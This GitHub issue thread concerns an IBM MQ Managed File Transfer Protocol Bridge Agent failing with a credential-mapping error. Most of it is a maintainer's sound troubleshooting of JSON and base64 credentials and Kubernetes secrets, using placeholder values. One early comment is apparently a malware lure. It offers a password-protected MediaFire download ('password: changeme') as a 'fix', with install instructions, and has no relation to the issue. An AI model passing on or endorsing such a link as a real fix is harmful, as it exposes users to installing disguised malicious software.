### ISSUE TITLE
Protocol Bridge Agent Issue with New Image from IBM Registry

### ISSUE THREAD

**Issue by josephsadek1** [ibm-messaging/mft-cloud#17]
I am writing to report an issue encountered while configuring our Protocol Bridge Agent using the latest image from the IBM Registry.

After successfully configuring the agent and ensuring the pod is up and running, we created a test transfer job to verify its functionality. However, the job failed with the following error: "No Credential mapping has been found for user "ibmuac02""

![image](https://github.com/user-attachments/assets/8e66893e-8358-4d19-98c0-972c139c21d6)
![Screenshot 2024-08-28 102055](https://github.com/user-attachments/assets/5a4cee16-ea02-477a-bb8e-a93127026e68)
![Screenshot 2024-08-28 102238](https://github.com/user-attachments/assets/33758549-37d6-452c-854e-eb3350bf0fe4)

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ShashikanthRaoT** [comment]
Hello @josephsadek1 - I had a look at the picture of the logs. It has "Failed to load credentials in JSON format from file .. The file does not appear to contain credentials in valid JSON format. Agent will now attempt to decode credentials in V1 (key-value) format". This is mostly because of incorrectly format ProtocolBridgeCredentials.prop file that you have supplied either through a Kubernetes secret or a configMap.

How are you providing serverHostKey and privateKey? They must be base64 encoded. Here is an example:

```
{
    "servers": [
        {
            "serverHostName": "1.2.0.3",
            "transferRequesterId": "*",
            "serverType": "SFTP",
            "serverUserId": "sftpuser1",
            "serverAssocName": "mftassoc2",
            "serverPassword": "passw0rd",
            "serverHostKey": "Zjc6MzM6ZmQYNzX6XTU6NTI6YTA6NjA6OTc6ZTM6YzI6OGU6NTY6MzI6OGQ6MDY",
            "serverPrivateKey": "LS0tLS1CRSDFJTiBPUEVOU1NIIFBSSVZBVEUgS0VZLS0tLS0NCmIzQmxibk56YUMxclpYa3RkakVBQUFBQUNtRmxjekkxTmkxamRISUFBQUFHWW1OeWVYQjBBQUFBR0FBQUFCQ0l5V00xVmMNClJzM2ZXZ3h5UGxEYVVFQUFBQUVBQUFBQUVBQUFJWEFBQUFCM056YUMxeWMyRUFBQUFEQVFBQkFBQUNBUUNmb3dTZ0taNE4NClV2ZERoaU1CMDBaTFBFa0pBeVN0ckVWelU4QnQwT29PaEEyS1NOa1A1eGNDajluTjEwS21haG1BWlRlZ3lmQUtlNTBkNDMNCklPNXhXZ2JvVjQ2Unh4UEFxOHBQcE1lczg1ajB1dVBYdDlkZ0JobEtXbWZ6Ym9xeE1mNlhwM3gxQktYTXBwTnJKcVoxR3ENCi9Zekh6SVBxQzV3K1NPOWxkQ3FnQjhVTkZjNEpWNjJQc0IxMlJaTHluM0NLN3oyOEdiQlV0Sld5NWV3R0tONmxILzlxMnkNCjducTd0SzJueFNmTGhUSVFBRGpIcFdxQ1pqVXM4MzQ4bXVhNXB3WkNWSGVGTUlkNVN3MFpFWERQbTlYSWtNN243c1NRankNCkJ4ZnRkYk84NXM4UFZrRW5GOTcrWnBIVVZROGdSQTVjN2lwSTVWdm9VYlRtMU8rUDd1Y0xOMVJTWURPSzRHTE1QcHF0VGYNClg0Vyt1QXhPbC85dGJuL1c2Z1laUjlQa1dTNWNpdndFQSt6dTRIcEdtSmlMaDNocHIzQnh4UnphbXpUVFFmUVlMYVNGVC8NCnRRblIxTmJBYTRialVOeWtBK0RMK3ZkbUhmalFzUHJMY1NISEY2cGJxbVJjTjRCQlZmL0U3YnZOMEY4Z1Y2SHFPNmhabkYNCjJJeDNDbmhvci90VzdzeDZ2a3h2d0lqUkhYUmw1SHJ1TUNRbmpEQXRKZ25LVVVMN3VXUXNvNVBVSkM1d3hiVHVQQy82YzANClpEdFB2WWZDTGNtS2J1aWNHeUVOTkEybXRRb1pTdG5ud21LL3JWMVBoSlpOS2VRMUcvWE5kKzc5VTN2Z1hhTmhOR1BpWHENClpvdkNvMmJLN1dFOUl5UXNuV0RJR3BZRUtBREZMTDBYYVpid2tLK1NMOWZRQUFCMUJpajJqSmtua2V4K2RhUDJwREV6eW0NClFKNUlVMDMzTDBWZG9PNnkxek5YdWp4Y3VBRmUyc3dEd0EwbXdxTEhScVBoUm00dEJaUHV1SXovYTZnZjA0cnMxbEo2SWsNCnBPNFN4NjBHS1NmaHRONW5NUnVYTEJ1SmxHM2lMOGx5MDFiS0djUnBkMzBsa3o2WHM1c3RBQ0U5ODZOTDZ2Q21hN2tRSisNCmd3R21Sb29QSElkWE9IWFV3NFdJSFc1YmY4MityZm9sY3ZMa2VLWUNkVGRkcVlxUWRPYmZ0eDdoTDIrcjNXWmw2TjdUdEcNClF2K3RkeXkzSG9vSXhwVXJST0xyUWpSWGFzdnYrNS9YZlJtZGlmSmNNeDJJR2dKdHhadSsxV0MveXd0QkJJOXQrMU1xN2ENCkdtRmZ0bE1lVGRhYzBVWEhuYU1RR01scDJrNEh3R2ttWDU4KzRQa0RZczNneS9rSmpkMW9pem5Zb00vMmhuVXhHcnlUWFINCkg0U1FNaTZ0cG5wTGVrVGFWUENaNy8rVk5CK01aa24wUFVWN09yRGQxcURhOHlSM1lJa0JlWkxqclZBQjJBbVhUbEFPL0UNCkh4QVlET25jM1RpVklvdUxhR2RyamNRcy9jRVJ3SFZSdzZZaEtaTHVSZmVwTStuM1IxdFdLSUR0MFZhQ2NybzI5bkNoNU8NCkdJUXhGanpDcTBmNGRpais1OFduOHlMZU8xMUxpdzMydjd4QlluUTYzTXBla0t5VWlrSVlTK0NJdFpGMlFVa3QxQm94SjANCmN0cEIyVzR5Rk9xbVBIQjYzOUpOUHI5N3NTTElNSU9pOWpWZnlBaE81Q2svRitWZXhhc0hyK0JtY2ZHU2J4TXFtWG9tcGwNCnE5Q0NMN2NtcWxJblEybG5paEpHQVoxSUl2OWo2eS94elEzYS9YVG1uNGFWMjdOYUdhemFZdkRDYWtqV0gwNzNPdmplYnkNCm00VE9FZ2pTSFJHMzNNSDNpcmJoU1BmMThNYkZPRmU1UFN0cDEyQmhnZGJUNWRUL1h4VjhjZjZTcGo3b1N4SFltTjBkR20NClFMcGROWlA3aUhtRGV1MVlFWHR1MmcxeHRVV1BGbldoNUxpQzdqWTY1L2MwaC84NWpnV3h5ZDBjQkxTOFhKODVmdnd0V3MNCnBCQmNYS0pGMTgyQWRhZ21jQlNyZGhzUVdZSHg2YmpZRUVjWGgwQUV0SDE3ME1zVGd5VzVjMTdBRkRQbHRTT08yZ05IUW0NCmp1blY4R09kdDlnNHB3WkY2T0VQWSsybmVlNVprN3VjdlVuYmtlVDJSY1VPN2tYNHhHRkRoRDZjY3M5KzBmczY4M2haQ0INCkxsYTVDcnNLZEVKSm8zMmFpdUx5U0Y0cmtwQTdsNDFjTndVYXRtbFBLQU11Vk9WTHd1N1VFZFJxTm1DU1hrek42YW9QU28NClg0cmlYYUkrS09POUF1Q2l1MlA0cERzUERXeGgvd1RoYkE4d05BZG1aejlIZjhLb1ppUHIrOVp2VVc2ZFk4Q0lHV25rSnINCnh4OVFKbVRlaFIwOUZmN29wckZWbHhrM21CV0VEU0VVbXlOTFEydTBuRTJDRWdPanB6SVVOcmR5a1ZMaFA2VmFUMnJkOGQNCkdyc2xXNDRrSUYvVkFiRWNwWjBFK3ZuNmRQcXFWU2kwdGIxcFVPUkpUZEluWnp6RGxWcnZXR0xWQjg1dDBia3FTU25CWTcNCnM0Rnp0TmN2N3liNDV1UVBlV21yTW1qY1ozSmtqdDh4VzlUQ2l2YmVnMWpMWlNJTmE4cXFMeW1LSXRVOWhIczlDTzYyV0gNCjN4bjA2ZkpsdkpIbGNnQytiWlRiSFFiQmE4eUV4MVl5OHVDOXJSUURtR0czMXNHaHd1Y1BYWmp6ZVE4Vkw1TlJzaWVZSmENCkJ5YkgrcS8vMjhwU3cyQVF4RWpoOE1EeUV5QXdYRXVnMEtPOXZYeHM3dHVYVDZFSVFYOHZxM1pDWUsxbTJrNmhmd1JKWUkNCnFoTElLZEF0MmZJRVpCeWNSbjQyYy9FdmQxZFArVldhSGRPZVFhWWs1dkE1YWtoeldXVmxJcDA4elMzVHF5TEZvT0lDS2wNCi9Ib1BOeFYwT1VMQkhBNFFqRDZBdmxXTitKdjJhRTV5Q3g1bmg3NU5jQXA1SDF2bFJIdHprdk9rckZ4a1RSbWdaZkhGWWkNCml1NEtQYlRSdW1kN2RGWnliMzRPSis5MWJZYk1iK2kxTXowTjZLbVR0bXlVNzg0bGZlWkVTSVNJaklranA4R3FURGdsZDINCnloanlGYkdmV2daVG9WUEZ2VEVldzdJQXlpUUhpNXpjK0g2QWlYTVZzVk1TbVU1SW9ldWFwaDlQd09nWmE0SnNBaFlzZkENCmxTdjI1d0g5Nm9pYWVJTHMyU2tscER0Mm1nK1JrdEhHQk9JNkFWSUVJUE5WU1ZTQlpJWXFKT2Z0OFA3QU44NVVyazhRQ1UNClA3eWI3QmxxeUMxcHJaN1QwMS9Xem1hNnRidHM3MTY2NE1EWlY5YU9PSUxEZU1TVTFCVU5jZDdqUksrcFZ1NnVTSjY4dkYNCmdvRExNOVg1Yi9XeVZjUHIwUVBzQTVlSnRIRjFYQnVpRmZrU29COTBiK3ROODlQUC9kUUU0YnRhdmhPREpoWW1rSzdyamENCkhDYkhadW1pcEMyRTlrQVUyRytzcGo4dVlFSUR6YmFFVXlzb2RaUTdNWnNBaU10emNHZzlIN0plT0Q4cTlQWmpjdFZXdHENCkY3WEJtL0Nrdm9PcVlUcHRlL0Z3bDc2ZTVjRk5hanlveTB1TklQcDVaT0x3cHNFcVRYUFB2bmFKTmxrMzE0TmdEa2ZaZjANClJhVVoxc3RubXJ0RkQ5OGZiVE11YTEvTkhlUFdtak8wSkY1cDN4V3k1ZTNENm9HREVBT0QyZDM4ZytwdjZRUE90aURjQVcNCjZHeVFCRWtpOTNtb1ZmSktvNENJVzRQOTdsekF3RG41SHBUNkYybFMvbUNHVGRlNStTci9YK2U2ZFA3RDlOREh3NHFRT2UNClBiMTNEU3NkVHNRY1JuNnhJaU5VMDJ0WGJhNHdlcFV5cE84QXEvSkxWMTdCVno4OTBKTEV6b0FkbHRFbjBaeGZpbllyZEsNCkp3aHIvMDJTZFUxTkIxR283RG1FSysyTnBkenZGRVluYUtlN29ZK1NqeUxsaUNCM1RndDdTa2lkbVBhdVpTd2M2VDZnL1gNClQvdFNKVTB0ckFveDk0cHhGbzFnSnE4OXdINU05b1FoUWQ4TmpIUitRMU5LdHU1MWtvaU9VNlN4YUcvMVFyS3l2bVhxUlYNCmZBSko2d0lIZzI2eGVydGx4MlVadUY4ZmM9DQotLS0tLUVORCBPUEVOU1NIIFBSSVZBVEUgS0VZLS0tLS0"
        }
    ]
}


```

Can you provide your configMap/secret containing ProtocolBridgeCredentials.prop file? It would help me to recreate the problem. You can replace SFTP server details with dummy ones.

Can you can also specifiy the environment variable in your agent deployment yaml to get further details of the exception?

```
            - name: ENABLE_PBA_CREDENTIAL_DEBUG_LOG
              value: "true"
```

Hope this helps.

Shashi

**Comment by josephsadek1** [comment]
Hi Shashi,

We tested the new image using sftp user and password, so we configured configMap as follows, as I mentioned this configuration from github URL (https://github.com/ibm-messaging/mq-container-mft/blob/master/docs/custompbacred.md) and we got the above issue, we haven't tested it yet on sftp using ssh key due to the mention configMap for ssh not acceptable on openshift.

kind: ConfigMap
apiVersion: v1
metadata:
  name: pba-custom-cred-map
  namespace: ibmmqmft
data:
  ProtocolBridgeCredentials.prop: sftp.server.com=sftpuid!0!SftpPassw0rd
  

  
![Screenshot 2024-09-01 105947](https://github.com/user-attachments/assets/349bcaca-129c-47cd-b272-0b5b0ac11ce3)

![Screenshot 2024-09-01 110129](https://github.com/user-attachments/assets/8ce8d5ae-427f-4bf1-bce4-e427234897c3)

**Comment by ShashikanthRaoT** [comment]
@josephsadek1 Have you tried my suggestions above? I did get an email but I don't see any update in this git issue. 

You can use a secret to provide your SFTP server credentials. If you are providing credentials through a secret you have to do the following:
1) Base64 Encode both the serverHostKey and serverPrivateKey values.
2) Add them to the json object as mentioned below.
```
{
    "servers": [
        {
            "serverHostName": "1.2.0.3",
            "transferRequesterId": "*",
            "serverType": "SFTP",
            "serverUserId": "sftpuser1",
            "serverAssocName": "mftassoc2",
            "serverPassword": "passw0rd",
            "serverHostKey": "Zjc6MzM6ZmQYNzX6XTU6NTI6YTA6NjA6OTc6ZTM6YzI6OGU6NTY6MzI6OGQ6MDY",
            "serverPrivateKey": "LS0tLS1CRSDFJTiBPUEVOU1NIIFBSSVZBVEUgS0VZLS0tLS0NCmIzQmxibk56YUMxclpYa3RkakVBQUFBQUNtRmxjekkxTmkxamRISUFBQUFHWW1OeWVYQjBBQUFBR0FBQUFCQ0l5V00xVmMNClJzM2ZXZ3h5UGxEYVVFQUFBQUVBQUFBQUVBQUFJWEFBQUFCM056YUMxeWMyRUFBQUFEQVFBQkFBQUNBUUNmb3dTZ0taNE4NClV2ZERoaU1CMDBaTFBFa0pBeVN0ckVWelU4QnQwT29PaEEyS1NOa1A1eGNDajluTjEwS21haG1BWlRlZ3lmQUtlNTBkNDMNCklPNXhXZ2JvVjQ2Unh4UEFxOHBQcE1lczg1ajB1dVBYdDlkZ0JobEtXbWZ6Ym9xeE1mNlhwM3gxQktYTXBwTnJKcVoxR3ENCi9Zekh6SVBxQzV3K1NPOWxkQ3FnQjhVTkZjNEpWNjJQc0IxMlJaTHluM0NLN3oyOEdiQlV0Sld5NWV3R0tONmxILzlxMnkNCjducTd0SzJueFNmTGhUSVFBRGpIcFdxQ1pqVXM4MzQ4bXVhNXB3WkNWSGVGTUlkNVN3MFpFWERQbTlYSWtNN243c1NRankNCkJ4ZnRkYk84NXM4UFZrRW5GOTcrWnBIVVZROGdSQTVjN2lwSTVWdm9VYlRtMU8rUDd1Y0xOMVJTWURPSzRHTE1QcHF0VGYNClg0Vyt1QXhPbC85dGJuL1c2Z1laUjlQa1dTNWNpdndFQSt6dTRIcEdtSmlMaDNocHIzQnh4UnphbXpUVFFmUVlMYVNGVC8NCnRRblIxTmJBYTRialVOeWtBK0RMK3ZkbUhmalFzUHJMY1NISEY2cGJxbVJjTjRCQlZmL0U3YnZOMEY4Z1Y2SHFPNmhabkYNCjJJeDNDbmhvci90VzdzeDZ2a3h2d0lqUkhYUmw1SHJ1TUNRbmpEQXRKZ25LVVVMN3VXUXNvNVBVSkM1d3hiVHVQQy82YzANClpEdFB2WWZDTGNtS2J1aWNHeUVOTkEybXRRb1pTdG5ud21LL3JWMVBoSlpOS2VRMUcvWE5kKzc5VTN2Z1hhTmhOR1BpWHENClpvdkNvMmJLN1dFOUl5UXNuV0RJR3BZRUtBREZMTDBYYVpid2tLK1NMOWZRQUFCMUJpajJqSmtua2V4K2RhUDJwREV6eW0NClFKNUlVMDMzTDBWZG9PNnkxek5YdWp4Y3VBRmUyc3dEd0EwbXdxTEhScVBoUm00dEJaUHV1SXovYTZnZjA0cnMxbEo2SWsNCnBPNFN4NjBHS1NmaHRONW5NUnVYTEJ1SmxHM2lMOGx5MDFiS0djUnBkMzBsa3o2WHM1c3RBQ0U5ODZOTDZ2Q21hN2tRSisNCmd3R21Sb29QSElkWE9IWFV3NFdJSFc1YmY4MityZm9sY3ZMa2VLWUNkVGRkcVlxUWRPYmZ0eDdoTDIrcjNXWmw2TjdUdEcNClF2K3RkeXkzSG9vSXhwVXJST0xyUWpSWGFzdnYrNS9YZlJtZGlmSmNNeDJJR2dKdHhadSsxV0MveXd0QkJJOXQrMU1xN2ENCkdtRmZ0bE1lVGRhYzBVWEhuYU1RR01scDJrNEh3R2ttWDU4KzRQa0RZczNneS9rSmpkMW9pem5Zb00vMmhuVXhHcnlUWFINCkg0U1FNaTZ0cG5wTGVrVGFWUENaNy8rVk5CK01aa24wUFVWN09yRGQxcURhOHlSM1lJa0JlWkxqclZBQjJBbVhUbEFPL0UNCkh4QVlET25jM1RpVklvdUxhR2RyamNRcy9jRVJ3SFZSdzZZaEtaTHVSZmVwTStuM1IxdFdLSUR0MFZhQ2NybzI5bkNoNU8NCkdJUXhGanpDcTBmNGRpais1OFduOHlMZU8xMUxpdzMydjd4QlluUTYzTXBla0t5VWlrSVlTK0NJdFpGMlFVa3QxQm94SjANCmN0cEIyVzR5Rk9xbVBIQjYzOUpOUHI5N3NTTElNSU9pOWpWZnlBaE81Q2svRitWZXhhc0hyK0JtY2ZHU2J4TXFtWG9tcGwNCnE5Q0NMN2NtcWxJblEybG5paEpHQVoxSUl2OWo2eS94elEzYS9YVG1uNGFWMjdOYUdhemFZdkRDYWtqV0gwNzNPdmplYnkNCm00VE9FZ2pTSFJHMzNNSDNpcmJoU1BmMThNYkZPRmU1UFN0cDEyQmhnZGJUNWRUL1h4VjhjZjZTcGo3b1N4SFltTjBkR20NClFMcGROWlA3aUhtRGV1MVlFWHR1MmcxeHRVV1BGbldoNUxpQzdqWTY1L2MwaC84NWpnV3h5ZDBjQkxTOFhKODVmdnd0V3MNCnBCQmNYS0pGMTgyQWRhZ21jQlNyZGhzUVdZSHg2YmpZRUVjWGgwQUV0SDE3ME1zVGd5VzVjMTdBRkRQbHRTT08yZ05IUW0NCmp1blY4R09kdDlnNHB3WkY2T0VQWSsybmVlNVprN3VjdlVuYmtlVDJSY1VPN2tYNHhHRkRoRDZjY3M5KzBmczY4M2haQ0INCkxsYTVDcnNLZEVKSm8zMmFpdUx5U0Y0cmtwQTdsNDFjTndVYXRtbFBLQU11Vk9WTHd1N1VFZFJxTm1DU1hrek42YW9QU28NClg0cmlYYUkrS09POUF1Q2l1MlA0cERzUERXeGgvd1RoYkE4d05BZG1aejlIZjhLb1ppUHIrOVp2VVc2ZFk4Q0lHV25rSnINCnh4OVFKbVRlaFIwOUZmN29wckZWbHhrM21CV0VEU0VVbXlOTFEydTBuRTJDRWdPanB6SVVOcmR5a1ZMaFA2VmFUMnJkOGQNCkdyc2xXNDRrSUYvVkFiRWNwWjBFK3ZuNmRQcXFWU2kwdGIxcFVPUkpUZEluWnp6RGxWcnZXR0xWQjg1dDBia3FTU25CWTcNCnM0Rnp0TmN2N3liNDV1UVBlV21yTW1qY1ozSmtqdDh4VzlUQ2l2YmVnMWpMWlNJTmE4cXFMeW1LSXRVOWhIczlDTzYyV0gNCjN4bjA2ZkpsdkpIbGNnQytiWlRiSFFiQmE4eUV4MVl5OHVDOXJSUURtR0czMXNHaHd1Y1BYWmp6ZVE4Vkw1TlJzaWVZSmENCkJ5YkgrcS8vMjhwU3cyQVF4RWpoOE1EeUV5QXdYRXVnMEtPOXZYeHM3dHVYVDZFSVFYOHZxM1pDWUsxbTJrNmhmd1JKWUkNCnFoTElLZEF0MmZJRVpCeWNSbjQyYy9FdmQxZFArVldhSGRPZVFhWWs1dkE1YWtoeldXVmxJcDA4elMzVHF5TEZvT0lDS2wNCi9Ib1BOeFYwT1VMQkhBNFFqRDZBdmxXTitKdjJhRTV5Q3g1bmg3NU5jQXA1SDF2bFJIdHprdk9rckZ4a1RSbWdaZkhGWWkNCml1NEtQYlRSdW1kN2RGWnliMzRPSis5MWJZYk1iK2kxTXowTjZLbVR0bXlVNzg0bGZlWkVTSVNJaklranA4R3FURGdsZDINCnloanlGYkdmV2daVG9WUEZ2VEVldzdJQXlpUUhpNXpjK0g2QWlYTVZzVk1TbVU1SW9ldWFwaDlQd09nWmE0SnNBaFlzZkENCmxTdjI1d0g5Nm9pYWVJTHMyU2tscER0Mm1nK1JrdEhHQk9JNkFWSUVJUE5WU1ZTQlpJWXFKT2Z0OFA3QU44NVVyazhRQ1UNClA3eWI3QmxxeUMxcHJaN1QwMS9Xem1hNnRidHM3MTY2NE1EWlY5YU9PSUxEZU1TVTFCVU5jZDdqUksrcFZ1NnVTSjY4dkYNCmdvRExNOVg1Yi9XeVZjUHIwUVBzQTVlSnRIRjFYQnVpRmZrU29COTBiK3ROODlQUC9kUUU0YnRhdmhPREpoWW1rSzdyamENCkhDYkhadW1pcEMyRTlrQVUyRytzcGo4dVlFSUR6YmFFVXlzb2RaUTdNWnNBaU10emNHZzlIN0plT0Q4cTlQWmpjdFZXdHENCkY3WEJtL0Nrdm9PcVlUcHRlL0Z3bDc2ZTVjRk5hanlveTB1TklQcDVaT0x3cHNFcVRYUFB2bmFKTmxrMzE0TmdEa2ZaZjANClJhVVoxc3RubXJ0RkQ5OGZiVE11YTEvTkhlUFdtak8wSkY1cDN4V3k1ZTNENm9HREVBT0QyZDM4ZytwdjZRUE90aURjQVcNCjZHeVFCRWtpOTNtb1ZmSktvNENJVzRQOTdsekF3RG41SHBUNkYybFMvbUNHVGRlNStTci9YK2U2ZFA3RDlOREh3NHFRT2UNClBiMTNEU3NkVHNRY1JuNnhJaU5VMDJ0WGJhNHdlcFV5cE84QXEvSkxWMTdCVno4OTBKTEV6b0FkbHRFbjBaeGZpbllyZEsNCkp3aHIvMDJTZFUxTkIxR283RG1FSysyTnBkenZGRVluYUtlN29ZK1NqeUxsaUNCM1RndDdTa2lkbVBhdVpTd2M2VDZnL1gNClQvdFNKVTB0ckFveDk0cHhGbzFnSnE4OXdINU05b1FoUWQ4TmpIUitRMU5LdHU1MWtvaU9VNlN4YUcvMVFyS3l2bVhxUlYNCmZBSko2d0lIZzI2eGVydGx4MlVadUY4ZmM9DQotLS0tLUVORCBPUEVOU1NIIFBSSVZBVEUgS0VZLS0tLS0"
        }
    ]
}

```
3) Now Base64 encode the entire json.
4) Create a secret with the Base64 encoded json. Your secret would then look something like this:

```
kind: Secret
apiVersion: v1
metadata:
  name: pba-custom-cred-secret
  namespace: ibm-mqmft
data:
  ProtocolBridgeCredentials.prop: >
  
 eyJzZXJ2ZXJzIjogW3sic2VydmVySdsdsG9zdE5hbWUiOiAiMTcyLjE3LjAuMyIsInRyYW5zZmVyUmVxdWVzdGVySWQiOiAiKiIsInNlc
```

I have just tried with latest published image and I am able to transfer files to SFTP server successfully.

**Comment by josephsadek1** [comment]
Hi Shashi 

I can't use the new image with sftp using username and password it give me the same issue
When I configure credential as following 

kind: ConfigMap
apiVersion: v1
metadata:
  name: rx-air-pba01-cred-mft-config1
data:
  ProtocolBridgeCredentials.prop: >-
    {
      "servers": [{
        "serverHostName": "saneussftptestinng02.blob.core.windows.net",
        "serverType": "SFTP",
        "serverUserId": "saneussftptestinng02.dev.devuser1",
        "serverPassword": "*****************************"
    }]}
  
  ![1](https://github.com/user-attachments/assets/501d7ce4-146b-46d3-bee4-08d861055150)
![2](https://github.com/user-attachments/assets/6a5a447b-af0f-45b1-b29c-f76b3d6344ab)
![3](https://github.com/user-attachments/assets/f37b9b56-9012-45ba-9270-b531a0345bc6)

**Comment by ShashikanthRaoT** [comment]
As mentioned in my earlier update, you must provide all attributes when supplying credentials through a JSON formatted file. Supplying just few attributes is not sufficient. I suggest you try by providing all attributes - including the hostkey, private key, password for the private key. Your SFTP server administrator should be able to provide all the required credentials details. As I mentioned earlier a OpenShift secret to supply SFTP credentials. Give it a try.

I shall see if I can recreate the problem when supplying credentials as below:
```
kind: ConfigMap
apiVersion: v1
metadata:
name: pba-custom-cred-map
namespace: ibmmqmft
data:
ProtocolBridgeCredentials.prop: sftp.server.com=sftpuid!0!SftpPassw0rd

```

**Comment by ShashikanthRaoT** [comment]
@josephsadek1 We don't have a SFTP server that supports UID/PWD combination, so I am unable to test. As I suggested in previous update, I again suggest you to use SSH key - you can supply the required attributes in Secret. 

Hope this helped.

**Comment by josephsadek1** [comment]
Hi SHashi

How can I encode private key and host key
did you encode private key file file as following 
 base64 -w0 id_rsa > id_rsa.64
and host key 
echo -n '4b:da:27:5d:4f:b5:e7:93:d4:65:ca:50:e2:ab:f0:85' | base64 -w0

**Comment by ShashikanthRaoT** [comment]
I have used Notepad++ editor that provides MIME plugin to Base64 encode/decode.

**Comment by josephsadek1** [comment]
Hi Shashi,

It not worked when using secert 
secret didn't created due to encoded error

![image](https://github.com/user-attachments/assets/3addef38-6cad-4bfe-9e1d-543483147e6f)

**Comment by ShashikanthRaoT** [comment]
Hi @josephsadek1 

I got a similar error when there were some whitespace characters at the end of the Base64 encoded text. Can you please check if you there are copy/pasting any such characters when creating secret?

**Comment by josephsadek1** [comment]
Hi Shashi,

I'm reaching out to inquire about the possibility of setting up a high availability configuration for our IBM MFT agent, similar to an active-standby setup. This would ensure uninterrupted service in case of any issues with the primary agent.

Could you please let me know if this is feasible and if so, what steps would be involved in implementing such a configuration?

Thank you for your time and assistance.

**Comment by ShashikanthRaoT** [comment]
Hi @josephsadek1 

MFT Agent is kind of a stateless container as it doesn't store any transfer status inside the container or any mounted storage. Transfer status will be stored in a state queue SYSTEM.FTE.STATUS.<agent name> on the agent queue manager. 

If an agent container running transfers goes down for any reason, the OpenShift Container Platform will respawn the MFT container. Once the MFT container is back online, the agent running inside the container will resume all inflight transfers. In the Active/Standby HA configuration, the standby will not be processing any transfer but it does consume system resources. So I see no solid reason to setup a Active/Standby HA configuration for MFT.

Having said that, MFT does provide an option to configure Active/Standby HA. Specifying highlyAvailable=true in agent configuration confgMap will enable HA. You will need to run two instances of the MFT Container using the same configMap. An example configuration is here.

```
    "agents": [
        {
            "name": "SRCAGENT",
            "deleteOnTermination": "true",
            "type": "STANDARD",
            "qmgrName": "MFTQM",
            "qmgrHost": "172.17.0.2",
            "qmgrPort": 1414,
            "qmgrChannel": "MFT_SVRCONN",
            "additionalProperties": {
                "enableQueueInputOutput": "true",
                "trace": "all",
                "logCapture": "true",
                **"highlyAvailable":"true",**
            }
        }
    ]

```

**Comment by josephsadek1** [comment]
Hi Shashi,

I try using **"highlyAvailable":"true" and created second deployment using the same configuration but it not worked and the pod give me error status  due to agent already running. 

![image](https://github.com/user-attachments/assets/c4ea57b7-07e4-4d5e-bd95-264d8b9287de)

**Comment by ShashikanthRaoT** [comment]
@josephsadek1 - I would like to know what happened to the SFTP configuration issue for which this work item was created? Did that get resolved? If yes - can this work item be closed? If not investigation can be continued using this work item.

For MFT Agent HA, I suggest you raise another git issue!.

**Comment by ShashikanthRaoT** [comment]
For HA, I suggest you make use of the feature provided by OpenShift as if an agent pod goes down, OpenShift will respin the pod and bring it back online. MFT Agent will run as a stateless container, all transfer status is stored in agent queue manager. 

I did some futher investigation and found that highlyAvailable property is valid only for on-prem agent, not valid on OpenShift Platform. I think it's because the agent HA functionality can be achieved by using OpenShift feature - respin a pod if it goes down.

**Comment by josephsadek1** [comment]
Hi Shashi,

I'm writing to follow up on the MFT agent configuration I've been working on. I was able to successfully configure the agent using SFTP using SSH, and I've successfully utilized the configmap for credential management.

However, I'm still encountering the same issue when attempting to use the secret for authentication.

**Comment by ShashikanthRaoT** [comment]
Hi @josephsadek1 

I am glad you were able to get going with SSH key. 

Regarding the error when using secret: Are you getting error when creating a secret? You mentioned encoding error "secret didn't created due to encoded error"?

As I mentioned earlier, I had the same problem and that was due space characters at the end of the Base64 encoded string. Removing them solved the problem.

**Comment by ShashikanthRaoT** [comment]
I believe this issue has been resolved. Closing. Please reopen if you think otherwise.
